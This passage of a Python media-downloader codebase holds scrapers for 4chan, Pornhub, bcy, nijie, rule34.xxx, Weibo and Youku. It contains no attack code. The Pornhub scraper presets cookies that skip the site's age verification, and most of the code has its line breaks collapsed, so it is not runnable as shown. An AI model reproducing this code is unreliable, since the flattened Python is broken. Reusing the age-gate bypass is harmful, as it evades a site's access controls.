'writesubtitles': True, } if ytdl.get_extractor_name(url) == 'spankbang': options['legacyserverconnect'] = True #6545 ydl = ytdl.YoutubeDL(options, cw=cw) try: info = ydl.extract_info(url) except Exception as e: if 'ERROR: Unsupported URL' in str(e): return UnSupportedError(str(e)) raise e if not ie_key: ie_key = ytdl.get_extractor_name(url) info['ie_key'] = ie_key url_new = info.get('url') formats = info.get('formats', []) if not formats and (info.get('entries') or 'title' not in info): if 'entries' in info: entry = info['entries'][0] url_new = entry.get('url') or entry['webpage_url'] if url_new != url: return get_video(url_new, session, cw, ie_key=get_ie_key(info)) 
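    # Propagate any extractor-supplied HTTP headers (e.g. User-Agent/Referer)
    # to the download session before scoring and picking formats below.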
session.headers.update(info.get('http_headers', {})) #session.cookies.update(ydl.cookiejar) if not formats: if url_new: f = {'url': url_new, 'format': ''} formats.append(f) fs = [] for i, f in enumerate(formats): f['_index'] = i f['_resolution'] = int_or_none(re.find(r'([0-9]+)p', f['format'], re.I)) or f.get('height') or f.get('width') or int_or_none(f.get('quality')) or int(f.get('vcodec', 'none') != 'none') #5995 f['_vbr'] = f.get('vbr') or 0 f['_audio'] = f.get('abr') or f.get('asr') or int(f.get('acodec', 'none') != 'none') print_(format_(f)) fs.append(f) #4773 res = max(get_resolution(), min(f['_resolution'] for f in fs)) print_(f'res: {res}') fs = [f for f in fs if f['_resolution'] <= res] if not fs: raise Exception('No videos') def filter_f(fs): for f in fs: if allow_m3u8: return f ext = get_ext_(f['url'], session, url) if ext.lower() != '.m3u8': return f print_('invalid url: {}'.format(f['url'])) return list(fs)[0]# f_video = filter_f(sorted(fs, key=lambda f:(f['_resolution'], int(bool(f['_audio'])), f['_vbr'], f['_index']), reverse=True)) #6072, #6118 print_('video0: {}'.format(format_(f_video))) if f_video['_audio']: f_audio = None else: fs_audio = sorted([f_audio for f_audio in fs if (not f_audio['_resolution'] and f_audio['_audio'])], key=lambda f:(f['_audio'], f['_vbr'], f['_index'])) if fs_audio: f_audio = fs_audio[-1] else: try: print_('trying to get f_video with audio') f_video = filter_f(reversed(sorted([f for f in fs if f['_audio']], key=lambda f:(f['_resolution'], f['_index'])))) except Exception as e: print_('failed to get f_video with audio: {}'.format(e)) f_audio = None print_('video: {}'.format(format_(f_video))) print_('audio: {}'.format(format_(f_audio))) video = Video(f_video, f_audio, info, session, url, cw=cw) return video def get_ie_key(info): ie_key = info.get('ie_key') or info['extractor'] ie_key = ie_key.split(':')[0] if ie_key.lower().endswith('playlist'): ie_key = ie_key[:-len('playlist')] return ie_key def get_ext_(url, session, referer): try: ext = downloader.get_ext(url, session, referer) except Exception as e: ext = get_ext(url) return ext class Video: live = False def __init__(self, f, f_audio, info, session, referer, cw=None): self.f_audio = f_audio self.cw = cw self.title = title = info['title'] self.id = info['id'] self.url = f['url'] self.artist = info.get('uploader') self.header = utils.capitalize(get_ie_key(info)) self.session = session self.referer = referer self.subs = ytdl.get_subtitles(info) self.url_thumb = info.get('thumbnail') self.thumb = BytesIO() if self.url_thumb: downloader.download(self.url_thumb, referer=referer, buffer=self.thumb, session=session) ext = get_ext_(self.url, session, referer) def foo(): hdr = session.headers.copy() if referer: hdr['Referer'] = referer self.live = True return utils.LiveStream(self.url, headers=hdr, fragments=f.get('fragments') if ytdl.LIVE_FROM_START.get('etc') else None) if not ext: if f['_resolution']: ext = '.mp4' else: ext = '.mp3' if ext.lower() == '.m3u8': res = get_resolution() #4773 if info.get('live_status') == 'is_live': url = foo() else: try: url = playlist2stream(self.url, referer, session=session, n_thread=4) except: url = M3u8_stream(self.url, referer=referer, session=session, n_thread=4) if url.live is not None: #5110 url = foo() ext = '.mp4' elif ext.lower() == '.mpd': # TVer url = foo() ext = '.mp4' else: url = self.url self.url = LazyUrl(referer, lambda x: url, self, pp=self.pp) info_ext = info.get('ext') if info_ext == 'unknown_video': #vk info_ext = None self.filename = 
format_filename(title, self.id, info_ext or ext, header=self.header, live=self.live) def pp(self, filename): if self.f_audio: f = BytesIO() downloader.download(self.f_audio['url'], buffer=f, referer=self.referer, session=self.session) ffmpeg.merge(filename, f, cw=self.cw) utils.pp_subtitle(self, filename, self.cw) return filename File: src/extractor/_4chan_downloader.py import downloader from utils import Downloader, File, clean_title, urljoin, get_ext, limits import utils class File_4chan(File): type = '4chan' format = 'page:04;' @limits(.5) def get(self): return {} class Downloader_4chan(Downloader): type = '4chan' URLS = [r'regex:boards.(4chan|4channel).org'] MAX_CORE = 4 display_name = '4chan' ACCEPT_COOKIES = [r'(.*\.)?(4chan|4channel)\.org'] @classmethod def fix_url(cls, url): return url.split('#')[0] def read(self): soup = downloader.read_soup(self.url) for div in soup.findAll('div', class_='fileText'): href = urljoin(self.url, div.a['href']) d = { 'page': len(self.urls), } file = File_4chan({'url': href, 'referer': self.url, 'name': utils.format('4chan', d, get_ext(href))}) self.urls.append(file) board = self.url.split('/')[3] title = soup.find('span', class_='subject').text id_ = int(self.url.split('/thread/')[1].split('/')[0]) self.title = clean_title(f'[{board}] {title} ({id_})') File: src/extractor/pornhub_downloader.py #coding:utf8 ''' Pornhub Downloader ''' from io import BytesIO import downloader import ree as re from utils import (Downloader, Soup, try_n, LazyUrl, urljoin, get_print, Session, get_max_range, filter_range, get_ext, format_filename, clean_title, get_resolution, check_alive) import clf2 import utils from m3u8_tools import playlist2stream, M3u8_stream import errors from error_printer import print_error import ytdl class File: ''' File ''' _thumb = None def __init__(self, id_, title, url, url_thumb, artist=''): self.id_ = id_ self.title = clean_title(f'{title}') self.url = url ext = get_ext(self.url) if ext.lower() == '.m3u8': try: self.url = playlist2stream(self.url, n_thread=4) except: self.url = M3u8_stream(self.url, n_thread=4) self.url_thumb = url_thumb if ext.lower() == '.m3u8': ext = '.mp4' self.filename = format_filename(self.title, self.id_, ext, artist=artist) def thumb(self): if self._thumb is None: f = BytesIO() downloader.download(self.url_thumb, buffer=f) self._thumb = f else: f = self._thumb f.seek(0) return f class Video: ''' Video ''' _url = None filename = None thumb = None def __init__(self, url, cw, session): url = Downloader_pornhub.fix_url(url) self.url = LazyUrl(url, self.get, self) self.cw = cw self.session = session @try_n(2) def get(self, url): ''' get ''' cw = self.cw session = self.session print_ = get_print(cw) if self._url: return self._url id_ = re.find(r'viewkey=(\w+)', url, re.I) or \ re.find(r'/embed/(\w+)', url, re.I) print_('id: {}'.format(id_)) if 'viewkey=' not in url.lower() and '/gif/' not in url.lower(): if id_ is None: raise Exception('no id') url = urljoin(url, '/view_video.php?viewkey={}'.format(id_)) url_test = url.replace('pornhubpremium.com', 'pornhub.com') try: html = downloader.read_html(url_test, session=session) soup = Soup(html) if soup.find('div', id='lockedPlayer'): print_('Locked player') raise Exception('Locked player') url = url_test except Exception as e: #3511 print_(print_error(e)) url = url.replace('pornhub.com', 'pornhubpremium.com') html = downloader.read_html(url, session=session) soup = Soup(html) soup = fix_soup(soup, url, session, cw) html = soup.html # removed if soup.find('div', 
class_='removed'): raise Exception('removed') gif = soup.find('div', {'id': 'gifImageSection'}) if gif: print_('GIF') id_ = url.split('/gif/')[1] id_ = re.findall('[0-9a-zA-Z]+', id_)[0] jss = list(gif.children) for js in jss: if 'data-mp4' in getattr(js, 'attrs', {}): break else: raise Exception('gif mp4 url not found') title = js['data-gif-title'] url = js['data-mp4'] url_thumb = re.find(r'https?://.+?.phncdn.com/pics/gifs/.+?\.jpg', html, err='no thumb') file = File('gif_{}'.format(id_), title, url, url_thumb) else: if id_ is None: raise Exception('no id') print_('Video') # 1968 title = soup.find('h1', class_='title') for item in title.findAll(class_='phpFree'): item.decompose() title = title.text.strip() #4940 artist = soup.find('div', class_='userInfo').find('div', class_='usernameWrap').text.strip() ydl = ytdl.YoutubeDL(cw=cw) info = ydl.extract_info(url) session.headers.update(info.get('http_headers', {})) fs = [] for f in info['formats']: f['quality'] = f.get('height') or 0 if f['protocol'].startswith('m3u8'): f['quality'] -= 1 if 'dash' in f['protocol'].lower(): #5554 continue print_('[{}p] {} {}'.format(f['height'], f['protocol'], f['url'])) fs.append(f) if not fs: raise Exception('No formats') fs = sorted(fs, key=lambda f: f['quality']) res = get_resolution() fs_good = [f for f in fs if f['quality'] <= res] if fs_good: f = fs_good[-1] else: f = fs[0] print_('\n[{}p] {} {}'.format(f['height'], f['protocol'], f['url'])) file = File(id_, title, f['url'], info['thumbnail'], artist) self._url = file.url self.title = file.title self.filename = file.filename self.thumb = file.thumb return self._url def is_login(session, cw=None, n=2): ''' is_login ''' print_ = get_print(cw) print_('is_login {}'.format(n)) if n <= 0: return False url = 'https://www.pornhubpremium.com' soup = downloader.read_soup(url, session=session) soup = fix_soup(soup, url, session, cw) if soup.find('ul', id='profileMenuDropdown'): return True return is_login(session, cw, n-1) class Downloader_pornhub(Downloader): ''' Downloader ''' type = 'pornhub' single = True strip_header = False URLS = ['pornhub.com', 'pornhubpremium.com', 'pornhubthbh7ap3u.onion'] ACCEPT_COOKIES = [r'.*(pornhub|phncdn|pornhubpremium).*'] #6181 @classmethod def fix_url(cls, url): if 'pornhub_gif_' in url: url = 'https://www.pornhub.com/gif/{}'.format( url.replace('pornhub_gif_', '')) elif 'pornhub_album_' in url: url = 'https://www.pornhub.com/album/{}'.format( url.replace('pornhub_album_', '')) elif 'pornhub_' in url: url = 'https://www.pornhub.com/view_video.php?viewkey={}'\ .format(url.replace('pornhub_', '')) if '/authenticate/goToLoggedIn' in url: qs = utils.query_url(url) url = urljoin(url, qs['url'][0]) url = url.replace('pornhubthbh7ap3u.onion', 'pornhub.com') return url @classmethod def key_id(cls, url): for domain in cls.URLS: if domain in url: id_ = domain + url.split(domain)[1] break else: raise Exception('no id') return id_.split('#')[0] @try_n(2) def read(self): cw = self.cw session = self.session = Session() # 1791 self.purge_cookies() session.cookies.update({ 'age_verified': '1', 'accessAgeDisclaimerPH': '1', 'accessPH': '1', }) #6124 if 'pornhubpremium.com' in self.url.lower() and\ not is_login(session, cw): raise errors.LoginRequired(method='browser', url='https://www.pornhubpremium.com/premium/login') videos = [] tab = ''.join(self.url.replace('pornhubpremium.com', 'pornhub.com', 1).split('?')[0].split('#')[0].split('pornhub.com/')[-1].split('/')[2:3]) if '/album/' in self.url: self.print_('Album') info = read_album(self.url, 
session=session) self.single = False for photo in info['photos']: self.urls.append(photo.url) self.title = clean_title(info['title']) elif '/photo/' in self.url: self.print_('Photo') info = read_photo(self.url, session=session) self.urls.append(info['photo'].url) self.title = info['title'] elif tab not in ['', 'videos']: raise NotImplementedError(tab) elif 'viewkey=' not in self.url.lower() and\ '/embed/' not in self.url.lower() and\ '/gif/' not in self.url.lower(): self.print_('videos') info = get_videos(self.url, session, cw) hrefs = info['hrefs'] self.print_('videos: {}'.format(len(hrefs))) if not hrefs: raise Exception('no hrefs') videos = [Video(href, cw, session) for href in hrefs] video = self.process_playlist(info['title'], videos) self.setIcon(video.thumb()) self.enableSegment() else: video = Video(self.url, cw, session) video.url() self.urls.append(video.url) self.setIcon(video.thumb()) self.title = video.title self.enableSegment() def fix_soup(soup, url, session=None, cw=None): ''' fix_soup ''' print_ = get_print(cw) if soup.find('div', class_='logo'): return soup print_('invalid soup: {}'.format(url)) res = clf2.solve(url, session=session, cw=cw) session.purge(Downloader_pornhub.ACCEPT_COOKIES) return Soup(res['html']) class Photo_lazy: ''' Photo_lazy ''' def __init__(self, url, session): self._session = session self.url = LazyUrl(url, self.get, self) def get(self, url): info = read_photo(url, self._session) photo = info['photo'] url = photo.url() self.filename = photo.filename return url class Photo: ''' Photo ''' def __init__(self, url, referer, id_, session): self._session = session ext = get_ext(url) self.filename = f'{id_}{ext}' self.url = LazyUrl(referer, lambda _: url, self) @try_n(8) def read_album(url, session=None): ''' read_album ''' photos = [] soup = downloader.read_soup(url, session=session) id_album = re.find('/album/([0-9]+)', url, err='no album id') for block in soup.findAll('div', class_='photoAlbumListBlock'): href = block.a.attrs['href'] href = urljoin(url, href) photo = Photo_lazy(href, session) photos.append(photo) info = {} title = soup.find('h1', class_='photoAlbumTitleV2').text info['title'] = format_filename(title, f'album_{id_album}') info['photos'] = photos return info @try_n(8) def read_photo(url, session=None): ''' read_photo ''' id_ = re.find('/photo/([0-9]+)', url, err='no photo id') soup = downloader.read_soup(url, session=session) section = soup.find('div', id='photoImageSection') photo = section.find('img')['src'] info = {} info['photo'] = Photo(photo, url, id_, session) title = soup.find('h1').text info['title'] = format_filename(title, f'photo_{id_}') return info @try_n(4) def get_videos(url, session, cw=None): ''' get_videos ''' print_ = get_print(cw) if '/users/' in url: mode = 'users' username = url.split('/users/')[1].split('/')[0] elif '/pornstar/' in url: mode = 'pornstar' username = url.split('/pornstar/')[1].split('/')[0] elif '/model/' in url: mode = 'model' username = url.split('/model/')[1].split('/')[0] elif '/channels/' in url: mode = 'channels' username = url.split('/channels/')[1].split('/')[0] elif '/playlist/' in url: mode = 'playlist' username = url.split('/playlist/')[1].split('/')[0] else: raise Exception('Not supported url') username = username.split('?')[0].split('#')[0] domain = utils.domain(url) if mode in ['pornstar']: url_main = 'https://{}/{}/{}'.format(domain, mode, username) html = downloader.read_html(url_main, session=session) soup = Soup(html) soup = fix_soup(soup, url_main, session, cw) for a in 
soup.findAll('a'): if '/{}/{}/videos/upload'.format(mode, username) in a.attrs.get('href', ''): free = True break else: free = False print_('free: {}'.format(free)) # Range max_pid = get_max_range(cw) html = downloader.read_html(url, session=session) soup = fix_soup(Soup(html), url, session, cw) info = {} # get title h1 = soup.find('h1') if h1: header = 'Playlist' title = h1.parent.find(id='watchPlaylist') else: title = None if not title: header = 'Channel' profile = soup.find('div', class_='profileUserName') wrapper = soup.find('div', class_='titleWrapper') bio = soup.find('div', class_='withBio') title = soup.find('h1', {'itemprop':'name'}) if not title and profile: title = profile.a if not title and wrapper: title = wrapper.h1 if not title and bio: title = bio.h1 if not title: raise Exception('No title') #print(title) info['title'] = '[{}] {}'.format(header, title.text.strip()) token = re.find('''token *= *['"](.*?)['"]''', html) print_('token: {}'.format(token)) # get links hrefs = [] fail = 0 for p in range(1, 1+100): check_alive(cw) try: if mode in ['users', 'model']: if mode == 'users': url_api = 'https://{}/users/{}/videos/public/'\ 'ajax?o=mr&page={}'.format(domain, username, p) elif mode == 'model': url_api = 'https://{}/model/{}/videos/upload/'\ 'ajax?o=mr&page={}'.format(domain, username, p) r = session.post(url_api) soup = Soup(r.text) if soup.find('h1'): print('break: h1') break elif mode in ['pornstar']: if free: url_api = 'https://{}/{}/{}/videos/upload'\ '?page={}'.format(domain, mode, username, p) soup = downloader.read_soup(url_api, session=session) soup = fix_soup(soup, url_api, session, cw) soup = soup.find('div', class_='videoUList') else: url_api = 'https://{}/{}/{}?page={}'.format(domain, mode, username, p) soup = downloader.read_soup(url_api, session=session) soup = fix_soup(soup, url_api, session, cw) soup = soup.find('ul', class_='pornstarsVideos') elif mode in ['channels']: url_api = 'https://{}/{}/{}/videos?page={}'.format(domain, mode, username, p) soup = downloader.read_soup(url_api, session=session) soup = fix_soup(soup, url_api, session, cw) try: soup = soup.find('div', {'id': 'channelsBody'}).find('div', class_='rightSide') except: break elif mode in ['playlist']: #url_api = 'https://{}/playlist/viewChunked?id={}&offset={}&itemsPerPage=40'.format(domain, username, len(hrefs)) if token is None: raise Exception('no token') url_api = 'https://{}/playlist/viewChunked?id={}&token={}&page={}'.format(domain, username, token, p) soup = downloader.read_soup(url_api, session=session) else: raise NotImplementedError(mode) fail = 0 except Exception as e: print_(e) fail += 1 if fail < 2: continue else: break finally: print_('{} ({})'.format(url_api, len(hrefs))) lis = soup.findAll('li', class_='videoblock') if not lis: print_('break: no lis') break if getattr(soup.find('title'), 'text', '').strip() == 'Page Not Found': print_('Page Not Found') break c = 0 for li in lis: a = li.find('a') href = a.attrs['href'] href = urljoin(url, href) if href in hrefs: continue c += 1 if href.startswith('javascript:'): # Remove Pornhub Premium print(href) continue hrefs.append(href) if c == 0: print('c==0') break print(c) # 1320 if len(hrefs) >= max_pid: break if cw: hrefs = filter_range(hrefs, cw.range) cw.fped = True info['hrefs'] = hrefs[:max_pid] return info File: src/extractor/bcy_downloader.py #coding:utf8 import downloader from utils import Soup, cut_pair, LazyUrl, Downloader, get_print, get_max_range, try_n, clean_title, check_alive, json import os from translator import tr_ 
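# Note on the SSR payload: bcy pages embed their data as
# `window.__ssr_data = JSON.parse("...")`. get_ssr_data() below cuts the quoted
# literal out of the HTML (cut_pair() presumably returns the balanced JSON
# span) and decodes it twice with json.loads: once to unescape the string
# literal, once to parse the JSON object it contains.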
class Downloader_bcy(Downloader):
    type = 'bcy'
    URLS = ['bcy.net/item/detail/', 'bcy.net/u/']
    MAX_CORE = 8
    display_name = '半次元'
    ACCEPT_COOKIES = [r'(.*\.)?bcy\.net']

    def init(self):
        self.html = downloader.read_html(self.url)
        self.info = get_info(self.url, self.html)

    @property
    def name(self):
        info = self.info
        if '/detail/' in self.url:
            title = '{} (bcy_{}) - {}'.format(clean_title(info['artist']), info['uid'], info['id'])
        else:
            title = '{} (bcy_{})'.format(clean_title(info['artist']), info['uid'])
        return title

    def read(self):
        imgs = get_imgs(self.url, self.html, cw=self.cw)

        for img in imgs:
            self.urls.append(img.url)

        self.title = self.name
        self.artist = self.info['artist']


def get_ssr_data(html):
    s = html.split('window.__ssr_data = JSON.parse("')[1].replace('\\"', '"')
    s = cut_pair(s).replace('"', '\\"')
    data = json.loads(json.loads('"{}"'.format(s)))
    return data


@try_n(2)
def get_imgs(url, html=None, cw=None):
    if '/detail/' not in url:
        return get_imgs_channel(url, html, cw)

    if html is None:
        html = downloader.read_html(url)
    data = get_ssr_data(html)

    multi = data['detail']['post_data']['multi']

    imgs = []
    for m in multi:
        path = m['original_path']
        img = json.loads('"{}"'.format(path))
        img = Image_single(img, url, len(imgs))
        imgs.append(img)
    return imgs


class Image_single:
    def __init__(self, url, referer, p):
        self._url = url
        self.p = p
        self.url = LazyUrl(referer, self.get, self)

    def get(self, referer):
        ext = get_ext(self._url, referer)
        self.filename = '{:04}{}'.format(self.p, ext)
        return self._url


class Image:
    def __init__(self, url, referer, id, p):
        self.id = id
        self.p = p
        self._url = url
        self.url = LazyUrl(referer, self.get, self)

    def get(self, referer):
        ext = get_ext(self._url, referer)
        self.filename = '{}_p{}{}'.format(self.id, self.p, ext)
        return self._url


def get_ext(url, referer=None):
    ext = os.path.splitext(url.split('?')[0].replace('~noop.image', ''))[1]
    if ext in ['.image', '']:
        ext = downloader.get_ext(url, referer=referer)
    return ext


def get_info(url, html):
    soup = Soup(html)
    info = {}

    uname = soup.find('div', class_='user-name') or soup.find('p', class_='uname') or soup.find('div', class_='user-info-name')
    info['artist'] = uname.text.strip()

    j = get_ssr_data(html)
    if '/detail/' in url:
        info['uid'] = j['detail']['detail_user']['uid']
        info['id'] = j['detail']['post_data']['item_id']
    else:
        info['uid'] = j['homeInfo']['uid']

    return info


def get_imgs_channel(url, html=None, cw=None):
    print_ = get_print(cw)
    if html is None:
        html = downloader.read_html(url)
    info = get_info(url, html)

    # Range
    max_pid = get_max_range(cw)

    ids = set()
    imgs = []
    for p in range(1000):
        url_api = 'https://bcy.net/apiv3/user/selfPosts?uid={}'.format(info['uid'])
        if imgs:
            url_api += '&since={}'.format(imgs[-1].id)
        data_raw = downloader.read_html(url_api, url)
        data = json.loads(data_raw)['data']
        items = data['items']
        if not items:
            print('no items')
            break
        c = 0
        for item in items:
            check_alive(cw)
            id = item['item_detail']['item_id']
            if id in ids:
                print('duplicate')
                continue
            c += 1
            ids.add(id)
            url_single = 'https://bcy.net/item/detail/{}'.format(id)
            imgs_single = get_imgs(url_single, cw=cw)
            print_(str(id))
            for p, img in enumerate(imgs_single):
                img = Image(img._url, url_single, id, p)
                imgs.append(img)
            s = '{} {} - {}'.format(tr_('읽는 중...'), info['artist'], min(len(imgs), max_pid))
            if cw:
                cw.setTitle(s)
            else:
                print(s)
            if len(imgs) >= max_pid:
                break
        if not c:
            print('not c')
            break
        if len(imgs) >= max_pid:
            print('over max_pid:', max_pid)
            break

    return imgs[:max_pid]


File: src/extractor/nijie_downloader.py

#coding: utf-8
import 
downloader from utils import Downloader, Session, urljoin, get_max_range, get_print, clean_title, try_n, get_ext, check_alive, File, limits, clean_url from translator import tr_ import ree as re from errors import LoginRequired import utils def get_id(url): return re.find('id=([0-9]+)', url) def isLogin(soup): if soup.find('ul', id="sub-menu"): return True return False class Downloader_nijie(Downloader): type = 'nijie' URLS = ['nijie.info'] MAX_CORE = 4 display_name = 'ニジエ' ACCEPT_COOKIES = [r'(.*\.)?nijie\.info'] def init(self): if 'members.php' not in self.url and 'members_illust.php' not in self.url: raise NotImplementedError() self.session = Session() @classmethod def fix_url(cls, url): if 'nijie.info' not in url.lower(): url = f'https://nijie.info/members.php?id={url}' return url.replace('http://', 'https://') @property def name(self): name = self.soup.find('p', class_='user_icon').find('a', class_='name').text.strip() name = f'{name} (nijie_{get_id(self.url)})' return clean_title(name) def read(self): id = get_id(self.url) self.soup = read_soup(f'https://nijie.info/members.php?id={id}', session=self.session) if not isLogin(self.soup): raise LoginRequired(method='browser', url='https://nijie.info/login.php') self.title = self.name self.urls += get_imgs(self.url, self.name, self.session, self.cw) self.title = self.name class Image(File): type = 'nijie' def get(self): url = self['referer'] if '://' not in url: return {'url': url} id = int(re.find('[?&]id=([0-9]+)', url)) url = url.replace('view.php', 'view_popup.php') #6726 soup = read_soup(url, self['rereferer'], session=self.session) view = soup.find('div', id='img_window') imgs = [] p = 0 for img in view.findAll('img'): url_img = urljoin(url, img['src']) url_img = re.sub('__rs_l[0-9]+x[0-9]+/', '', url_img) if '/filter/' in url_img: continue ext = get_ext(url_img) name = f'{id}_p{p}{ext}' imgs.append({'url': url_img, 'name': name}) p += 1 return imgs @try_n(12, sleep=lambda try_: 10+try_*10) @limits(5) def read_soup(*args, **kwargs): return downloader.read_soup(*args, **kwargs) def setPage(url, page): if 'p=' in url: url = re.sub('p=[0-9]*', f'p={page}', url) else: url += f'&p={page}' return url def get_imgs(url, title=None, session=None, cw=None): print_ = get_print(cw) url = clean_url(url) id = get_id(url) url = f'https://nijie.info/members_illust.php?id={id}' olds = utils.process_olds(Image, title, r'([0-9]+)_p', cw) ids = olds['ids'] imgs_old = olds['imgs'] # Range max_pid = get_max_range(cw) imgs = [] for p in range(1, 101): url = setPage(url, p) print_(url) soup = read_soup(url, session=session) posts = soup.findAll('div', class_='nijie') if not posts: print_('no posts') break c = 0 for post in posts: check_alive(cw) url_img = urljoin(url, post.a.attrs['href']) id_ = int(re.find(r'[&\?]id=([0-9]+)', url_img, err='no id')) if id_ in ids: continue ids.add(id_) img = Image({'referer': url_img, 'rereferer': url}) imgs.append(img) c += 1 print_(f'c: {c}') msg = f'{tr_("읽는 중...")} {title} - {len(imgs)}' if cw: cw.setTitle(msg) else: print(msg) if len(imgs) >= max_pid or c == 0: break return imgs + imgs_old File: src/extractor/rule34_xxx_downloader.py import downloader import ree as re import os from utils import Downloader, query_url, Soup, get_max_range, get_print, clean_title, try_n, check_alive, clean_url from translator import tr_ from urllib.parse import quote LIMIT = 100 def get_tags(url): url = clean_url(url) qs = query_url(url) if 'page=favorites' in url: id = qs.get('id', ['N/A'])[0] id = 'fav_{}'.format(id) else: tags = 
qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' return id class Downloader_rule34_xxx(Downloader): type = 'rule34_xxx' URLS = ['rule34.xxx'] MAX_CORE = 8 display_name = 'Rule34.xxx' _name = None ACCEPT_COOKIES = [r'(.*\.)?rule34\.xxx'] @classmethod def fix_url(cls, url): if 'rule34.xxx' in url.lower(): url = url.replace('http://', 'https://') else: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = quote(url) url = url.replace('%2B', '+') url = 'https://rule34.xxx/index.php?page=post&s=list&tags={}'.format(url) return url @property def name(self): if self._name is None: tags = get_tags(self.url) self._name = tags return clean_title(self._name) def read(self): self.title = self.name imgs = get_imgs(self.url, self.name, cw=self.cw) for img in imgs: self.urls.append(img.url) self.filenames[img.url] = img.filename self.title = self.name class Image: def __init__(self, id_, url): self.url = url ext = os.path.splitext(url)[1] self.filename = '{}{}'.format(id_, ext) def setPage(url, page): # Always use HTTPS url = url.replace('http://', 'https://') # Change the page if 'pid=' in url: url = re.sub('pid=[0-9]*', 'pid={}'.format(page), url) else: url += '&pid={}'.format(page) return url def get_imgs(url, title=None, cw=None): url = clean_url(url) if 's=view' in url and 'page=favorites' not in url: raise NotImplementedError('Not Implemented') if 'page=dapi' not in url.lower(): tags = get_tags(url) tags = quote(tags, safe='/') tags = tags.replace('%20', '+') url = "https://rule34.xxx/index.php?page=dapi&s=post&q=index&tags={}&pid={}&limit={}".format(tags, 0, LIMIT) print_ = get_print(cw) # Range max_pid = get_max_range(cw) imgs = [] ids = set() for p in range(500): #1017 check_alive(cw) url = setPage(url, p) print_(url) html = try_n(4, sleep=30)(downloader.read_html)(url) #3340 soup = Soup(html) posts = soup.findAll('post') if not posts: break for post in posts: id_ = post.attrs['id'] if id_ in ids: print('duplicate:', id_) continue ids.add(id_) url_img = post.attrs['file_url'] img = Image(id_, url_img) imgs.append(img) if len(imgs) >= max_pid: break if cw is not None: cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs))) return imgs File: src/extractor/weibo_downloader.py #coding:utf8 import downloader import ree as re from utils import Downloader, Session, get_print, clean_title, Soup, fix_protocol, domain, get_max_range, get_ext, File, check_alive, limits from translator import tr_ import clf2 import errors import utils import dateutil.parser def suitable(url): if domain(url.lower(), 2) not in ['weibo.com', 'weibo.cn']: return False if '/tv/' in url.lower(): return False return True class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://weibo.com/login.php', w=1180) class Downloader_weibo(Downloader): type = 'weibo' URLS = [suitable] MAX_PARALLEL = 2 #6739 ACCEPT_COOKIES = [r'(.*\.)?(weibo\.com|sina\.com\.cn|weibo\.cn)'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): url = url.replace('weibo.cn', 'weibo.com').split('?')[0] if 'weibo.com/p/' in url: id = re.find(r'weibo.com/p/([^/]+)', url, err='no id') url = f'https://weibo.com/p/{id}' elif 'weibo.com/u/' in url: id = re.find(r'weibo.com/u/([^/]+)', url, err='no id') url = f'https://weibo.com/u/{id}' elif 'weibo.com/' in url: id = re.find(r'weibo.com/([^/]+)', url, err='no id') url = f'https://weibo.com/{id}' else: id = url url = f'https://weibo.com/u/{id}' return fix_protocol(url) 
def read(self): checkLogin(self.session) uid, oid, name = get_id(self.url, self.cw) title = clean_title(f'{name} (weibo_{uid})') self.urls += get_imgs(uid, title, self.session, cw=self.cw) self.title = title def checkLogin(session): c = session.cookies._cookies.get('.weibo.com', {}).get('/',{}).get('SUBP') if not c or c.is_expired(): raise LoginRequired() class Album: def __init__(self, id, type): self.id = id self.type = type @limits(1) def wait(): pass class Image(File): type = 'weibo' format = '[date] id_ppage' def _get_page_id(html): return re.find(r"CONFIG\['page_id'\]='([0-9]+)'", html) or re.find(r'/u/page/follow/([0-9]+)', html) def get_id(url, cw=None): for try_ in range(2): try: res = clf2.solve(url, cw=cw, f=_get_page_id) html = res['html'] soup = Soup(html) if soup.find('div', class_='gn_login') or soup.find('a', class_=lambda c: c and c.startswith('LoginBtn')): raise LoginRequired() oid = _get_page_id(html) if not oid: raise Exception('no page_id') uids = re.findall(r'uid=([0-9]+)', html) uid = max(set(uids), key=uids.count) name = re.find(r"CONFIG\['onick'\]='(.+?)'", html) or soup.find('div', class_=lambda c:c and c.startswith('ProfileHeader_name')).text.strip() if not name: raise Exception('no name') break except errors.LoginRequired as e: raise e except Exception as e: e_ = e print(e) else: raise e_ return uid, oid, name def extract_video(d): return d.get('stream_url_hd') or d['stream_url'] def get_imgs(uid, title, session, cw=None): #6739 print_ = get_print(cw) print_(f'uid: {uid}') olds = utils.process_olds(Image, title, r'([0-9]+)_p', cw) mids = olds['ids'] imgs_old = olds['imgs'] referer = f'https://weibo.com/u/{uid}?tabtype=album' imgs = [] sinceid = None while check_alive(cw): if sinceid: url_api = f'https://weibo.com/ajax/profile/getImageWall?uid={uid}&sinceid={sinceid}' else: url_api = f'https://weibo.com/ajax/profile/getImageWall?uid={uid}&sinceid=0&has_album=true' wait() d = downloader.read_json(url_api, referer, session=session) sinceid = d['data']['since_id'] for item in d['data']['list']: mid = int(item['mid']) if mid in mids: #print_(f'dup: {mid}') continue mids.add(mid) url_api = f'https://weibo.com/ajax/statuses/show?id={mid}' wait() d = downloader.read_json(url_api, referer, session=session) if d.get('ok') != 1: print_(f'skip: {mid}') continue date = dateutil.parser.parse(d['created_at']) structs = [d] + (d.get('url_struct') or []) for struct in structs: media_info = struct.get('mix_media_info', {}).get('items') or (struct.get('pic_infos').values() if 'pic_infos' in struct else None) #6739 if media_info: break else: print_(f'no media: {mid}') #6739 continue for p, item in enumerate(media_info): if data := item.get('data'): type = item.get('type') if type == 'video': img = extract_video(data['media_info']) elif type == 'pic': img = data['largest']['url'] else: raise Exception(f'media type: {type}') else: img = item['largest']['url'] ext = get_ext(img) d = { 'date': date, 'id': mid, 'page': p, } filename = utils.format('weibo', d, ext) img = Image({'referer': referer, 'url': img, 'name': filename}) imgs.append(img) cw.setTitle(f'{tr_("읽는 중...")} {title} - {len(imgs)}') if not sinceid: break if len(imgs) >= get_max_range(cw): break return imgs + imgs_old File: src/extractor/youku_downloader.py import downloader import ytdl from m3u8_tools import M3u8_stream from utils import LazyUrl, Downloader, format_filename from io import BytesIO class Downloader_youku(Downloader): type = 'youku' single = True URLS = ['v.youku.com'] ACCEPT_COOKIES = [r'(.*\.)?youku\.com'] 
